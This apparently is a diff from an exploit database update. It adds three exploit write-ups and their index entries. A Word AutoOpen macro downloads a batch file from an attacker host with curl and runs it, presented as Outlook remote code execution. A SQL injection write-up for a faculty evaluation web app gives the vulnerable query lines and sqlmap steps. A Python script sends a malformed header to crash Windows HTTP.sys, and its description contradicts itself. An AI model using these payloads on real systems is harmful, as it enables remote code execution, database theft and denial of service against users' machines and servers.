DB: 2023-07-08

4 changes to exploits/shellcodes/ghdb

Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution
Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
Bus Pass Management System 1.0 - 'Search' SQL injection
Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
Bus Pass Management System 1.0 - 'Search' SQL injection

Faculty Evaluation System v1.0 - SQL Injection

Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution

exploits/multiple/remote/51574.txt

@@ -0,0 +1,38 @@
+## Title: Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution
+## Author: nu11secur1ty
+## Date: 07.07.2023
+## Vendor: https://www.microsoft.com/
+## Software: https://outlook.live.com/owa/
+## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
+## CVE-2023-33131
+
+
+## Description:
+In this vulnerability, the Microsoft Outlook app allows an attacker to
+send an infected Word file with malicious content
+to everyone who using the Outlook app, no matter web or local.
+Microsoft still doesn't have a patch against this 0-day vulnerability today.
+
+## Staus: HIGH Vulnerability
+
+[+]Exploit:
+
+- The malicious Word file:
+
+```js
+Sub AutoOpen()
+  Call Shell("cmd.exe /S /c" & "curl -s
+https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat >
+nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus)
+End Sub
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131)
+
+## Proof and Exploit
+[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html)
+
+## Time spend:
+00:30:00

exploits/php/webapps/51573.txt

@@ -0,0 +1,50 @@
+# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection
+# Date: 07/2023
+# Exploit Author: Andrey Stoykov
+# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
+# Version: 1.0
+# Tested on: Windows Server 2022
+
+
+SQLi #1
+
+File: edit_evaluation
+
+Line #4
+$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();
+[...]
+
+
+SQLi #2
+
+File: view_faculty.php
+
+Line #4
+
+// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer
+[...]
+$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
+[...]
+
+
+Steps to Exploit:
+
+1. Login to application
+2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"
+3. Copy request to intercept proxy to file
+4. Exploit using SQLMap
+
+
+sqlmap -r test.txt  --threads 1 --dbms=mysql --fingerprint
+
+[...]
+[INFO] testing MySQL
+[INFO] confirming MySQL
+[INFO] the back-end DBMS is MySQL
+[INFO] actively fingerprinting MySQL
+[INFO] executing MySQL comment injection fingerprint
+back-end DBMS: active fingerprint: MySQL >= 5.7
+               comment injection fingerprint: MySQL 5.6.49
+               fork fingerprint: MariaDB
+[...]

exploits/windows/remote/51575.txt

@@ -0,0 +1,70 @@
+## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution
+## Author: nu11secur1ty
+## Date: 01.14.2022
+## Vendor: https://www.microsoft.com/
+## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264
+## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
+## CVE-2022-21907
+
+
+## Description:
+NOTE: After a couple of hours of tests and experiments, I found that
+there have been no vulnerabilities, this is just a ridiculous
+experiment of Microsoft. When I decided to install the IIS packages on
+these Windows platforms, everything was ok, and everything is patched!
+Windows Server 2019, Windows 10 version 1809 - 2018 year are not
+vulnerable by default, but after I decided to upgrade from 1909 to
+2004. I found a serious problem! The Windows 10 version 2004 - 2020
+year is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack
+method: buffer overflow - deny of service and restart the system. This
+problem exists, from last year which is reported on CVE-2021-31166,
+and still there! On that days I have worked on it again with the help
+and collaboration of Axel Souchet 0vercl0k the author of the idea. On
+that day, I wrote an only one-line command to exploit this
+vulnerability!
+
+[+]Exploit:
+```python
+#!/usr/bin/python
+# Author @nu11secur1ty
+# CVE-2022-21907
+
+from colorama import init, Fore, Back, Style
+init(convert=True)
+import requests
+import time
+
+print(Fore.RED +"Please input your host...\n")
+print(Style.RESET_ALL)
+
+print(Fore.YELLOW)
+host = input()
+print(Style.RESET_ALL)
+
+print(Fore.BLUE +"Sending of especially malicious crafted packages,
+please wait...")
+print(Style.RESET_ALL)
+time.sleep(17)
+
+print(Fore.GREEN)
+# The PoC :)
+poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding':
+'AAAAAAAAAAAAAAAAAAAAAAAA,\
+	 BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
+	 RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
+	 TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
+	 OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
+	 ****************************stupiD, *, ,',})
+# Not necessary :)
+print(poc,"\n")
+print(Style.RESET_ALL)
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907)
+
+## Proof and Exploit
+[href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html)
+
+## Time spend:
+05:30:00

files_exploits.csv

@@ -11033,6 +11033,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info
 24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info
 51538,exploits/multiple/remote/51538.txt,"Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing",2023-06-22,nu11secur1ty,remote,multiple,,2023-06-22,2023-06-22,0,,,,,,
+51574,exploits/multiple/remote/51574.txt,"Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution",2023-07-07,nu11secur1ty,remote,multiple,,2023-07-07,2023-07-07,0,CVE-2023-33131,,,,,
 19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info
 51376,exploits/multiple/remote/51376.txt,"Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)",2023-04-20,nu11secur1ty,remote,multiple,,2023-04-20,2023-04-20,0,CVE-2023-28311,,,,,
 20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info
@@ -15121,8 +15122,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12485,exploits/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,webapps,php,,2010-05-01,,0,,,,,,
 43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,,2017-12-14,2017-12-14,1,CVE-2017-17645,,,,,
 51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-07-04,1,,,,,,
-50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",2021-09-09,"Emre Aslan",webapps,php,,2021-09-09,2021-09-09,0,,,,,,
+50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",2021-09-09,"Emre Aslan",webapps,php,,2021-09-09,2023-07-07,1,,,,,,
-50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,,
+50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2023-07-07,1,,,,,,
 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,,
 50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
 51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-35155,,,,,
@@ -18185,6 +18186,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12521,exploits/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,ALTBTA,webapps,php,,2010-05-05,,0,OSVDB-64382;OSVDB-64381;OSVDB-64380;OSVDB-64379;OSVDB-64378;OSVDB-64377;OSVDB-64376;OSVDB-64375,,,,,
 49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php,,2020-12-22,2020-12-22,0,,,,,,
 51495,exploits/php/webapps/51495.py,"Faculty Evaluation System 1.0 - Unauthenticated File Upload",2023-05-31,URGAN,webapps,php,,2023-05-31,2023-06-04,1,CVE-2023-33440,,,,,
+51573,exploits/php/webapps/51573.txt,"Faculty Evaluation System v1.0 - SQL Injection",2023-07-07,"Andrey Stoykov",webapps,php,,2023-07-07,2023-07-07,1,,,,,,
 10230,exploits/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,webapps,php,,2009-11-24,,1,,,,,,
 43072,exploits/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15987,,,,,
 4712,exploits/php/webapps/4712.txt,"falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting",2007-12-10,MhZ91,webapps,php,,2007-12-09,2016-10-20,1,OSVDB-40988;CVE-2007-6490;OSVDB-40987;OSVDB-40986;CVE-2007-6489;OSVDB-40985;CVE-2007-6488,,,,http://www.exploit-db.comfalcon143.tar.gz,
@@ -45244,6 +45246,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40767,exploits/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,remote,windows,,2016-11-15,2016-11-15,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwinaxe.exe,http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt
 41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe,
 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
+51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info
 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,
 7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,,